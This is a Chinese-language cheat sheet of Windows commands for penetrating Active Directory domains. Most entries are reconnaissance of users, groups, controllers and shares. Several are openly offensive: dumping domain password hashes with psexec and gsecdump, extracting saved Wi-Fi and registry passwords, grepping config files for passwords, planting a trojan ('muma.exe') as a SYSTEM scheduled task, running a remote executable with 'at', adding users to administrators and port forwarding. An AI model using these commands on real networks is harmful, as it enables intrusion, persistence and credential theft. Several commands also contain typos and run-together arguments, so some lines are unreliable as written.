域渗透常用命令

whoami /all

查看当前域并获取域SID(查看当前用户、权限)

wmic product get name,version

查看安转的软件及版本信息

net localgroup administrators

查看本地管理员组（通常包含域用户）

net session

列出本地计算机与所连接的客户端主机之间的会话

wmic qfe get Caption,Description,HotFixID,InstalledOn

查看补丁列表

net share

查看本机共享

wmic share get name,path,status

查看本机共享

tasklist / svc

查看本机进程

wmic process

查看本机进程

wmic process list brief

查看本机进程

wmic process get processid,executablepath,name

显示进程的路径、名称、pid

wmic service list brief

查看本机服务

wmic startuo get command,caption

查看自启程序列表

net statistics workstation

查看主机开机时间

schtasks /query /fo LIST /v

查看计划任务

net config workstation

判断是否存在域，机器属于哪个域

net view /domain

查询有几个域, 查询域列表

net time

查看域

net time /domian

查询主域服务器的时间

net group "domain controllers" /domain

查看域控制器组

nltest /DCLIST:0day

查看域控制器主机名，0day为域名

nltest /domain_trusts

列出域信任关系

net group /domain

查看域内用户组列表

net group "domain Admins" /domain

查看域管理员组

net group "Enterprise Admins" /domain

查看企业系统管理员组

net group "Domain Computers" /domain

查看所有的域成员主机

net group "Domain Controllers" /domain

查看域控制器

net accounts /domain

获取域密码信息

net user /domain

查看域用户信息

net user xxx /domain

查看指定域用户详细信息

wmic useraccount get /all

获取域内用户详细信息(用户名、描述信息、SID、域名、状态)

net group qq_group /domain

显示域中qq_group组的成员

net view /domain:testdomain

查看 testdomain域中的计算机列表

net user domain-admin /domain

查看管理员登陆时间，密码过期时间，是否有登陆脚本，组分配等信息

echo %logonserver%

查看登陆到这台服务器的计算机名

net time \\192.168.1.1

查询远程共享主机192.168.1.1的时间

net use \\IP\ipc$ password /user:username@domain

ipc$域内连接

net view \\dc2.0day.org

查看域控共享情况

dir \\dc2.0day.org /s /a > sysvol.txt

列出sysvol日志记录

xcopy \\dc2.0day.org\sysvol.txt sysvol.txt /i /e /c

远程拷贝到本地sysvol日志

net user /domain bk bk123

修改域内用户密码，需要管理员权限

net localgroup administartors 0day\zhangwei /add

将0day域中的用户zhangwei添加到administrators组中

mstsc /admin

远程桌面登录到console会话解决hash无法抓出问题

gpupdate/force

更新域策略

psexec \192.168.1.3 -u administrator -p bk1234 -c gsecdump.exe -u

从域服务器密码存储文件windows/ntds/ntds.dit导出hash值出来

gsecdump -a

获取域登管理员登录过得hash值，这里gescdump为第三方导出AD域的hash值

tasklist /S ip /U domain\username /P /V

查看远程计算机进程列表

ipconfig /all

查看IP地址

ipconfig /release

释放地址

ipconfig /renew

重新获取Ip地址

whoami

查询账号所属权限

whoami /all

查看sid值

systeminfo

查询系统以及补丁信息

tasklist /svc

查看进程

taskkill /im 进程名称(cmd)

结束进程

taskkill /pid

[进程码] -t(结束该进程) -f(强制结束该进程以及所有子进程)

wmic qfe get hotfixid

查看已安装过得补丁，这个很实用

wmic qfe list full /format:htable > hotfixes.htm

详细的补丁安装

wmic qfe

查询补丁信息以及微软提供的下载地址

ping hostname(主机名）

显示该机器名的IP

net start

查看当前运行的服务

net user

查看本地组的用户

net localhroup administrators

查看本机管理员组有哪些用户

net user

查看会话

net session

查看当前会话

net share

查看SMB指向的路径[即共享]

wmic share get name,path

查看SMB指向的路径

wmic nteventlog get path,filename,writeable

查询系统日志文件存储位置

net use \\IP\ipc$ password /user:username

建立IPC会话（工作组模式）

net use z: \\192.168.1.1

建立映射到本机Z盘

net time \\172.16.16.2

查询共享主机的是

at \\172.16.16.2 13:50 c:\windows\2009.exe

在共享主机上执行

netstat -ano

查看开放的端口

netstat -an | find "3389"

找到3389端口

net accounts

查看本地密码策略

nbtstat –A ip

netbiso查询

net view

查看机器注释或许能得到当前活动状态的机器列表，如果禁用netbios就查看不出来

echo %PROCESSOR_ARCHITECTURE%

查看系统是32还是64位

set

查看系统环境设置变量

net start

查看当前运行的服务

wmic service list brief

查看进程服务

wmic process list brief

查看进程

wmic startup list brief

查看启动程序信息

wmic product list brief

查看安装程序和版本信息（漏洞利用线索）

wmic startup list full

识别开机启动的程序

wmic process where(description="mysqld.exe")>>mysql.log

获取软件安装路径

for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan showprofiles') do @echo %j | findstr-i -v echo | netsh wlan show profiles %jkey=clear

一键获取wifi密码

if defined PSModulePath (echo 支持powershell) else (echo 不支持powershell)

查看是否支持posershell

qwinsta

查看登录情况

schtasks.exe /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "c:/muma.exe" /ED 2017/4/7

添加计划任务

REG query HKCU /v "pwd" /s

获取保存到注册表中的密码

tracert IP

路由跟踪

route print

打印路由表

arp -a

列出本网段内所有活跃的IP地址

arp -s （ip + mac）

绑定mac与ip地址

arp -d （ip + mac）

解绑mac与ip地址

nbtscan -r 192.168.16.0/24

通过小工具nbtscan扫描整个网络

netsh firewall show config

查看防火墙策略

netsh firewall show state

查看防火墙策略

for /l %i in (1,1,255) do @ping 10.0.0.%i -w 1 -n 1 | find /i "ttl"

批量扫描内网存活主机

netsh interface ipv6 install

首先安装IPV6（xp、2003下IPV6必须安装，否则端口转发不可用！）

netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=22connectaddress=1.1.1.1 connectport=22

将本机22到1.1.1.1的22

netsh interface portproxy add v4tov4 listenaddress=192.168.193.1listenport=22 connectaddress=8.8.8.8 connectport=22

netsh interface portproxy add v4tov4 listenaddress=192.168.193.1listenport=22 connectaddress=www.baidu.com connectport=22

netsh interface portproxy show all

查看转发配置

netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0listenport=22

删除配置

netsh firewall set portopening protocol=tcp port=22 name=Forwardmode=enable scope=all profile=all

添加防火墙规则，允许连接22：

dir /b/s config.*

查看所在目录所有config.为前缀的文件

findstr /si password .xml .ini *.txt

查看后缀名文件中含有password关键字的文件

findstr /si login .xml .ini *.txt

查看后缀名文件中含有login关键字的文件

copy con 创建命令：

copy con ftp.bat

创建ftp.bat批处理，然后输入ifconfig等命令，按ctr+z退出，并创建成功

copy con test.vbs

创建test.vbs脚本，输入脚本后，按ctr+z退出，并创建成功

dsquery user domainroot -limit 65535 && net user /domain

列出该域内所有用户名

dsquery server -domain super.com | dsget server -dnsname -site

搜索域内所有域控制器并显示他们的DNS主机名和站点名称

dsquery contact

寻找目录中的联系人

dsquery subnet

列出该域内网段划分

query user

查询那些用户在线

dsquery group && net group /domain

列出该域内分组

dsquery ou

列出该域内组织单位

dsquery server && net time /domain

列出该域内域控制器

dsquery site -o rdn

搜索域中所有站点的名称

dsquery group dc=super,dc=com |more

搜索在DC=SUPER,DC=COM 域中的所有组

psloggedon.exe

查询那台主机和用户登录到该主机上

netsess.exe //192.168.1.115

远程主机上无需管理员权限,查询到主机名和用户

reg query "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\TERMINAL SERVERCLIENT\DEFAULT"

获取最近mstsc登录的记录